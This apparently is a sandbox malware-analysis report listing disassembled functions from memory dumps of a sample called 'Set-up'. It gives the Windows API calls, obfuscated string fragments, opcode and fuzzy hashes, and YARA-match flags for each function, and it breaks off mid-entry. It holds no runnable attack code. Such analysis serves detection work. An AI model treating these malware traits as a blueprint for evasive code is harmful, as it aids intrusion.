LoadLibraryA.KERNEL32(00000000,?,?), ref: 01F1FC11

Strings

.dll, xrefs: 01F1FBB6

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: 6c94d1e408ed8cf0ef0492513bce48d654abc0e5408269e4d97cc0e82549b1f6
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: E3210676A04686CFE722CFACD854B6ABBA8FF01224F08416DDD068BA45D731EC498790

Function 0917D2E6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0917D507
GetComputerNameExA.KERNEL32(00000006,?,00000100), ref: 0917D5C4

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 69aaf93783aae2cf1d5bf4751b120d7290b1d024bf98fffd4a99a8f3a006b8a9
Instruction ID: f0a264649837091469d0abe625ce8edbef572c93d428606c70724ec087503c65
Opcode Fuzzy Hash: 69aaf93783aae2cf1d5bf4751b120d7290b1d024bf98fffd4a99a8f3a006b8a9
Instruction Fuzzy Hash: A521AF3521C3828BE7298F34D8547EBBBF2AF86309F58885DD0CA97281DB354145CB52

Function 0917BAB3 Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000005,?,00000100), ref: 0917C98B

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 10678a58a299e90f80c316afef7f80776fad9ad6c4371aad826e19f63e27a141
Instruction ID: 47178f9f54f5c8e6bfe43d26da01f3f672685cf94d1e942b65b144b48241fcf2
Opcode Fuzzy Hash: 10678a58a299e90f80c316afef7f80776fad9ad6c4371aad826e19f63e27a141
Instruction Fuzzy Hash: 8421CF712193C28AD3758F29C8597FBBBE1AFCA304F2D486DD4C9DB281DB7081498B52

Function 01F1E7D1 Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01F1E84B

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: e1250e71630bef2f63e07806d9f6d7dc551c19f8ae9cc44f446193a2d1d87546
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: 58B1B272900606EBDB23DE688C80BA7BBE9FF05310F14051DEE5A96156E733F554CBA1

Function 0917D4AE Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000006,?,00000100), ref: 0917D5C4

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: a4947b025fa639b9a9ed101027d968a048a760ed4da0c824e4fc1e00552da226
Instruction ID: f4614de6fc2887983abae127b145057c1ac5ec74de5290cd69454db08e3ffe21
Opcode Fuzzy Hash: a4947b025fa639b9a9ed101027d968a048a760ed4da0c824e4fc1e00552da226
Instruction Fuzzy Hash: 4911B23121C3868BE729DF34D8417EB7BF2AFC6709F84882DD08A87281DB358154CB52

Function 0915CC13 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0915CC25

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 711a7476f05c9c589b1076ae6cdb1924a56a6a5044697be17de0105745d6f961
Instruction ID: 738406110e34f7caba3cfaa5e5e3d37437f5b8ad7a5ed8c9503ae2d17792df3d
Opcode Fuzzy Hash: 711a7476f05c9c589b1076ae6cdb1924a56a6a5044697be17de0105745d6f961
Instruction Fuzzy Hash: C1E0DF767E0A083AF26C8429DC37F682153A7D0B16F38C35CB3132E2CCCAB4A8438109

Function 0917EBD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0917EC1B

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: fb60402eb83325b21508be8d27700b87c2e01d6b07eaed3b1d1494ea50d3062a
Instruction ID: 9efd17066150d7aeb06370edab8adfcf2b58fd5aa57aa65a49d061d624edac1e
Opcode Fuzzy Hash: fb60402eb83325b21508be8d27700b87c2e01d6b07eaed3b1d1494ea50d3062a
Instruction Fuzzy Hash: 09F067742097428FD354DF68D1A8B1ABBF1FB89304F10881DE4958B790C7B6A949CF82

Function 09181563 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 091815A7

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 3584910af1b2f8e4d17879bd3182acfdacecf0c77e4905ce04e7b975b1ffe993
Instruction ID: 91606ae5424d022c20b1a52d88fdc3b451d5c5f246b280a047c60a939f023d6d
Opcode Fuzzy Hash: 3584910af1b2f8e4d17879bd3182acfdacecf0c77e4905ce04e7b975b1ffe993
Instruction Fuzzy Hash: C6F0B2B02083429FE314EF28C1A871BBBE4AFC4304F11891CE4958B290CBB99948CF83

Function 0918CE81 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0918CE9A

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 1459ba4ca2874547643d515a25d12584c06c846256d504f1666e678e6abe2bc6
Instruction ID: 2be4b0c93d3f7b88c0e3c91f6fae878c78d9b295726935a9b18cd12e094ec034
Opcode Fuzzy Hash: 1459ba4ca2874547643d515a25d12584c06c846256d504f1666e678e6abe2bc6
Instruction Fuzzy Hash: 8CE08C79B01299AFCB02DF58E98596537A4EF0E309B04482DE282C3312D63BE446CF92

Function 0915CBE0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0915CBF3

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 73c520201bdb8c622e2c78c3bf9de3c538291f4baca12dec86bc3541e4e38173
Instruction ID: 933cf68dd2d14f3584532e9a4958ea8b1ab684a8d9bbedd18876d15f38b10144
Opcode Fuzzy Hash: 73c520201bdb8c622e2c78c3bf9de3c538291f4baca12dec86bc3541e4e38173
Instruction Fuzzy Hash: 9BD097303C01883FD210651CEC47F23335C8302311F800214F673C21E1C8903800C2AA

Function 0918CCE6 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 0918CCF2

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 77109b7bd4fb9bab476d6cc44e413222b9df0953178b04310df7556279475c34
Instruction ID: 3f4b383cc19f390047b571b9dd0c886481f527576a52dafa98267f15e6dc3845
Opcode Fuzzy Hash: 77109b7bd4fb9bab476d6cc44e413222b9df0953178b04310df7556279475c34
Instruction Fuzzy Hash: 6BB09B31344050B5C5553919BD08F9B6E64E7C2795F510551F105550F587105891D9D9

Function 0918B180 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,09158749,?,09158749), ref: 0918B190

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3db7b15176ac52d0411646a14a15be43343b211963278201822679849841bb3e
Instruction ID: bf78f8ba66bab6a480c76cfc97d75a1358a094bdfb7c798cb408e9a5ab43a140
Opcode Fuzzy Hash: 3db7b15176ac52d0411646a14a15be43343b211963278201822679849841bb3e
Instruction Fuzzy Hash: 87C04835249120AACA513A18EC08B8A3EA8AF862A4F164491B408670B4C760AC829A99

Function 0918B1B3 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0918B1BE

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6e3e73bf7a7141a7569a40f1ab2e297d36040447a579ec963d38913844d982a8
Instruction ID: ceb79b673e8e6732fcbe8be2197affd4cf00f4881036e15cdc0cb0bebc87da5e
Opcode Fuzzy Hash: 6e3e73bf7a7141a7569a40f1ab2e297d36040447a579ec963d38913844d982a8
Instruction Fuzzy Hash: D5B01230244020FACB913E14BC08FC63E50EB42221F110040F004250F4C7109CC1D998

Non-executed Functions

Function 01F07691 Relevance: 40.3, Strings: 32, Instructions: 339COMMON

Download Yara Rule

Strings

K, xrefs: 01F077AE
), xrefs: 01F07697
|, xrefs: 01F0786B
y, xrefs: 01F077FF
{, xrefs: 01F077C0
E, xrefs: 01F078CE
s, xrefs: 01F07850
|, xrefs: 01F077D2
r, xrefs: 01F077ED
s, xrefs: 01F077C9
m, xrefs: 01F078AA
t, xrefs: 01F0781A
t, xrefs: 01F0788F
e, xrefs: 01F07898
t, xrefs: 01F078B3
f, xrefs: 01F07808
t, xrefs: 01F07886
e, xrefs: 01F077F6
N, xrefs: 01F078D7
:, xrefs: 01F07793
j, xrefs: 01F07847
`, xrefs: 01F077E4
Y, xrefs: 01F078BC
c, xrefs: 01F0787D
}, xrefs: 01F0783E
X, xrefs: 01F078C5
}, xrefs: 01F07859
d, xrefs: 01F07862
{, xrefs: 01F07835
z, xrefs: 01F07823
{, xrefs: 01F077B7
O, xrefs: 01F078E0

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: )$:$E$K$N$O$X$Y$`$c$d$e$e$f$j$m$r$s$s$t$t$t$t$y$z${${${$|$|$}$}
API String ID: 0-2770104185
Opcode ID: 7f6e799ca60fba2b1e70b9238865b2de8e17b7e5c269d78dd588de653e8ae45d
Instruction ID: 9089b8410b6bf74e4d5818bef205c09ea628ae9e4b76a8fa212c9f55bcfb05f7
Opcode Fuzzy Hash: 7f6e799ca60fba2b1e70b9238865b2de8e17b7e5c269d78dd588de653e8ae45d
Instruction Fuzzy Hash: 59E1B835A2462986DB26CF14CC413DDB3B2FF85310F5491E8C5696B3A5EB389A81CB4B

Function 09185ED3 Relevance: 40.3, Strings: 32, Instructions: 339COMMON

Download Yara Rule

Strings

s, xrefs: 09186092
e, xrefs: 09186038
|, xrefs: 09186014
Y, xrefs: 091860FE
t, xrefs: 091860F5
s, xrefs: 0918600B
`, xrefs: 09186026
O, xrefs: 09186122
|, xrefs: 091860AD
r, xrefs: 0918602F
{, xrefs: 09186077
d, xrefs: 091860A4
t, xrefs: 0918605C
N, xrefs: 09186119
}, xrefs: 09186080
X, xrefs: 09186107
e, xrefs: 091860DA
t, xrefs: 091860C8
z, xrefs: 09186065
c, xrefs: 091860BF
}, xrefs: 0918609B
E, xrefs: 09186110
{, xrefs: 09186002
t, xrefs: 091860D1
:, xrefs: 09185FD5
m, xrefs: 091860EC
y, xrefs: 09186041
K, xrefs: 09185FF0
f, xrefs: 0918604A
), xrefs: 09185ED9
{, xrefs: 09185FF9
j, xrefs: 09186089

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: )$:$E$K$N$O$X$Y$`$c$d$e$e$f$j$m$r$s$s$t$t$t$t$y$z${${${$|$|$}$}
API String ID: 0-2770104185
Opcode ID: b11db89c250450f855d0065bd2cba818b777fa3ac90a0ddab915c8418d93d90e
Instruction ID: d0a950eda7214e1a7b6b9c1ee4f2c03c8d9271134309db7b78eb8775f8399795
Opcode Fuzzy Hash: b11db89c250450f855d0065bd2cba818b777fa3ac90a0ddab915c8418d93d90e
Instruction Fuzzy Hash: 2EE1A735A2462886DB25CF14CC513DEB3B2FF85354F5591E8C469AB361EB388A81CF4B

Function 01EDE433 Relevance: 29.0, Strings: 23, Instructions: 243COMMON

Download Yara Rule

Strings

Ehph, xrefs: 01EDE724
`h,h, xrefs: 01EDE68B
Rhvh, xrefs: 01EDE628
ehdh, xrefs: 01EDE696
ohuh, xrefs: 01EDE612
xhdh, xrefs: 01EDE633
Xh h, xrefs: 01EDE6F9
hh(h, xrefs: 01EDE680
RhTh, xrefs: 01EDE6B7
fhch, xrefs: 01EDE654
vh}h, xrefs: 01EDE607
0h+h, xrefs: 01EDE63E
uhjh, xrefs: 01EDE675
Kh^h, xrefs: 01EDE6E3
HhPh, xrefs: 01EDE6AC
uheh, xrefs: 01EDE649
FhFh, xrefs: 01EDE6EE
<h7h, xrefs: 01EDE704
yhrh, xrefs: 01EDE65F
shoh, xrefs: 01EDE66A
^hYh, xrefs: 01EDE6CD
ChYh, xrefs: 01EDE6D8
ph8h, xrefs: 01EDE61D

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
API String ID: 0-2769190428
Opcode ID: 62bd0668214c51b4c5d17cf1187cf7cd8d844dc3ff97adb52a48ee0f94597fea
Instruction ID: 26362f681c72102733ee28d9f49fb8130fa34eecf96d8d2f2a7507e126c579cb
Opcode Fuzzy Hash: 62bd0668214c51b4c5d17cf1187cf7cd8d844dc3ff97adb52a48ee0f94597fea
Instruction Fuzzy Hash: 96810CB18093D08AE7318F28D9893AFBBE1EBC2344F65596CC1C86F211EB360516CB52

Function 01EEFB4E Relevance: 18.3, Strings: 14, Instructions: 821COMMON

Download Yara Rule

Strings

5a|u, xrefs: 01EEFEB8
Y?q?, xrefs: 01EEFF4F
A:v], xrefs: 01EEFE88
2O#O, xrefs: 01EF0283
<[&^, xrefs: 01EEFE98
3?Uq, xrefs: 01EEFEB0
?g3q, xrefs: 01EEFF18
'O'O, xrefs: 01EF027B
sy:K, xrefs: 01EEFED0
7:n\, xrefs: 01EF0035
%b*], xrefs: 01EEFE78
^*a, xrefs: 01EEFE90
>, xrefs: 01EEFEE8
#J+Y, xrefs: 01EEFEF0

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: ^*a$#J+Y$%b*]$'O'O$2O#O$3?Uq$5a|u$7:n\$<[&^$>$?g3q$A:v]$Y?q?$sy:K
API String ID: 0-3553224314
Opcode ID: 0e7f15785e9422a88d43a37637ed228b1f63b83bd63c417a99a314ab803aab10
Instruction ID: 86995a417ffd8e8cf82f46b4b33c47e983e0a416d172fe2f4fa0a2fefb1b0af1
Opcode Fuzzy Hash: 0e7f15785e9422a88d43a37637ed228b1f63b83bd63c417a99a314ab803aab10
Instruction Fuzzy Hash: 055277719083818FD725CF28C85076FBBE2EF95318F0886ACE9D59B392D7358945CB92

Function 0916E390 Relevance: 18.3, Strings: 14, Instructions: 821COMMON

Download Yara Rule

Strings

7:n\, xrefs: 0916E877
>, xrefs: 0916E72A
2O#O, xrefs: 0916EAC5
Y?q?, xrefs: 0916E791
sy:K, xrefs: 0916E712
A:v], xrefs: 0916E6CA
'O'O, xrefs: 0916EABD
3?Uq, xrefs: 0916E6F2
5a|u, xrefs: 0916E6FA
^*a, xrefs: 0916E6D2
%b*], xrefs: 0916E6BA
#J+Y, xrefs: 0916E732
?g3q, xrefs: 0916E75A
<[&^, xrefs: 0916E6DA

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: ^*a$#J+Y$%b*]$'O'O$2O#O$3?Uq$5a|u$7:n\$<[&^$>$?g3q$A:v]$Y?q?$sy:K
API String ID: 0-3553224314
Opcode ID: 66e6460abd0a87f852f89973214687c36ca97ae2d029ef8f5ccd05dd4e025ab3
Instruction ID: 4fa39d06be92a20db870519f4ad00174e70330a23f14d992d7ceaacfd0bf752e
Opcode Fuzzy Hash: 66e6460abd0a87f852f89973214687c36ca97ae2d029ef8f5ccd05dd4e025ab3
Instruction Fuzzy Hash: 58525B75E083518FD724DF24C85076FBBE1AF86318F088A6DE8E65B3A1E7318525CB52

Function 01EF21DE Relevance: 16.7, Strings: 13, Instructions: 419COMMON

Download Yara Rule

Strings

O30, xrefs: 01EF22D6
#3=3, xrefs: 01EF22B6
83R3, xrefs: 01EF2296
83F3, xrefs: 01EF22C6
*, xrefs: 01EF2679
J3L3, xrefs: 01EF22CE
93=3, xrefs: 01EF22BE
d3f3, xrefs: 01EF227E
#3#3, xrefs: 01EF22A6
'3!3, xrefs: 01EF22AE
k3l3, xrefs: 01EF228E
i3_3, xrefs: 01EF2286
:3 3, xrefs: 01EF229E

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
API String ID: 0-1612148737
Opcode ID: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
Instruction ID: 3dced1ef4fa95d266a42aed1fd5acea5ec3f4d3e2a9603c51a87bdb96be2bfd4
Opcode Fuzzy Hash: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
Instruction Fuzzy Hash: 52B1FFB15183518BC724DF28C86666BB7F1FFC1318F099A1CEA868B3A4E774C840CB52

Function 09170A20 Relevance: 16.7, Strings: 13, Instructions: 419COMMON

Download Yara Rule

Strings

93=3, xrefs: 09170B00
83R3, xrefs: 09170AD8
k3l3, xrefs: 09170AD0
#3=3, xrefs: 09170AF8
i3_3, xrefs: 09170AC8
:3 3, xrefs: 09170AE0
O30, xrefs: 09170B18
83F3, xrefs: 09170B08
#3#3, xrefs: 09170AE8
J3L3, xrefs: 09170B10
'3!3, xrefs: 09170AF0
*, xrefs: 09170EBB
d3f3, xrefs: 09170AC0

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
API String ID: 0-1612148737
Opcode ID: 1d56701a34e86938c623c2fc1ec08dd359e2eeddee34e0e33eb5407e1f766043
Instruction ID: 52f154ccb202d4c819390408e4864fab65b3b4fa371461967ce7b075d1e15d2a
Opcode Fuzzy Hash: 1d56701a34e86938c623c2fc1ec08dd359e2eeddee34e0e33eb5407e1f766043
Instruction Fuzzy Hash: 63B112B1A183118BC724DF28C85266BB7F1FFC5358F199A1CE8968F3A0E7749544CB92

Function 09167C7A Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 237COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,FFFFCDE9,00000000,00000000,?), ref: 09167F21

Strings

{fGf, xrefs: 09167CF6
"f&f, xrefs: 09167CB5
,f4f, xrefs: 09167CD5
=f(f, xrefs: 09167CC5
Pf6f, xrefs: 09167CCD
)fvf, xrefs: 09167CDD
=f!f, xrefs: 09167CBD

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: "f&f$)fvf$,f4f$=f!f$=f(f$Pf6f${fGf
API String ID: 237503144-1107927452
Opcode ID: 5ad303b0616350e595fe196a720e4394492442ab52b36a8cfa6aa2e36801db56
Instruction ID: 592268cb88a6368e64a0e64a77877253637bcb801da6247c88506fb9b7596fac
Opcode Fuzzy Hash: 5ad303b0616350e595fe196a720e4394492442ab52b36a8cfa6aa2e36801db56
Instruction Fuzzy Hash: F071B172D143228BC3249F19C4916ABF7F1FF84758F06891DECC96B2A0E7349990CB85

Function 01F07D27 Relevance: 12.8, Strings: 10, Instructions: 278COMMON

Download Yara Rule

Strings

Y|, xrefs: 01F07D51
<, xrefs: 01F07EF7
?|, xrefs: 01F07E32
|, xrefs: 01F07D48
L|, xrefs: 01F07DB4
A|, xrefs: 01F07D99
H|, xrefs: 01F07DD8
>, xrefs: 01F07F00
3), xrefs: 01F08054
0, xrefs: 01F08044

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 0$3)$<$>$?|$A|$H|$L|$Y|$|
API String ID: 0-3316653610
Opcode ID: 0dc91d836e0d5c3997780718ccc6f68a7ea55a4edb7e82d95e45a445da5d2cfb
Instruction ID: 82a0e16043034b69b530f201ace226c9b79fa1808ef27ec7ebdb2f6939b0e5af
Opcode Fuzzy Hash: 0dc91d836e0d5c3997780718ccc6f68a7ea55a4edb7e82d95e45a445da5d2cfb
Instruction Fuzzy Hash: 44C1E132D1426886DB25CF29CC107DDB3B2FF41350F1995E9C949AB3A4E7314E82CB8A

Function 09186569 Relevance: 12.8, Strings: 10, Instructions: 278COMMON

Download Yara Rule

Strings

A|, xrefs: 091865DB
<, xrefs: 09186739
?|, xrefs: 09186674
>, xrefs: 09186742
0, xrefs: 09186886
L|, xrefs: 091865F6
3), xrefs: 09186896
|, xrefs: 0918658A
H|, xrefs: 0918661A
Y|, xrefs: 09186593

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: 0$3)$<$>$?|$A|$H|$L|$Y|$|
API String ID: 0-3316653610
Opcode ID: a1501234f4f825943155dbc7d1d8e6a45b8a224f0b647b65ae2599f14eb1c430
Instruction ID: d3258faa6b5c308ed3e83fb7e8cce83ea0cbbdf1f4097d748a02a51b1bfb5cf7
Opcode Fuzzy Hash: a1501234f4f825943155dbc7d1d8e6a45b8a224f0b647b65ae2599f14eb1c430
Instruction Fuzzy Hash: 25C1C471E142688ADB24CF69CC107DEB372EF41354F1595E9C859AB3A4E7344A82CF8A

Function 01EE9438 Relevance: 9.0, Strings: 7, Instructions: 237COMMON

Download Yara Rule

Strings

)fvf, xrefs: 01EE949B
=f(f, xrefs: 01EE9483
Pf6f, xrefs: 01EE948B
"f&f, xrefs: 01EE9473
{fGf, xrefs: 01EE94B4
,f4f, xrefs: 01EE9493
=f!f, xrefs: 01EE947B

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: "f&f$)fvf$,f4f$=f!f$=f(f$Pf6f${fGf
API String ID: 0-1107927452
Opcode ID: 1608b7182de8cbe444d3093ca434a734da6d5c0a9eca3f72a53d91f17003a5b6
Instruction ID: 67aa5759d2d7444c7fe012f8499d8acf80c1537ce3236f6b01557b4ec58af753
Opcode Fuzzy Hash: 1608b7182de8cbe444d3093ca434a734da6d5c0a9eca3f72a53d91f17003a5b6
Instruction Fuzzy Hash: 697113728143228BC3348F19C8906ABF7F1FF84758F0A991DECC96B265E7749980CB95

Function 01EEE282 Relevance: 9.0, Strings: 7, Instructions: 233COMMON

Download Yara Rule

Strings

8!(!, xrefs: 01EEE30C
{dd, xrefs: 01EEE481
ndsd, xrefs: 01EEE469
(!T!, xrefs: 01EEE32C
2!0!, xrefs: 01EEE304
pdvd, xrefs: 01EEE491
8!?!, xrefs: 01EEE31C

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: (!T!$2!0!$8!(!$8!?!$ndsd$pdvd${dd
API String ID: 0-1518220675
Opcode ID: 2f878382fdc0504f8a728bb41ff19acb4626bafb4b905e0c7bf6778849e2319d
Instruction ID: 9891adcbed3caa20ca19d62ab343622239e816e6c8bf39798768b65c7f592f2e
Opcode Fuzzy Hash: 2f878382fdc0504f8a728bb41ff19acb4626bafb4b905e0c7bf6778849e2319d
Instruction Fuzzy Hash: D371DC76A5C3119BC304CF56C84266FBBE2FFD5304F48A82CE5C98B211E235C6098B96

Function 0916CAC4 Relevance: 9.0, Strings: 7, Instructions: 233COMMON

Download Yara Rule

Strings

2!0!, xrefs: 0916CB46
(!T!, xrefs: 0916CB6E
8!(!, xrefs: 0916CB4E
ndsd, xrefs: 0916CCAB
8!?!, xrefs: 0916CB5E
{dd, xrefs: 0916CCC3
pdvd, xrefs: 0916CCD3

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
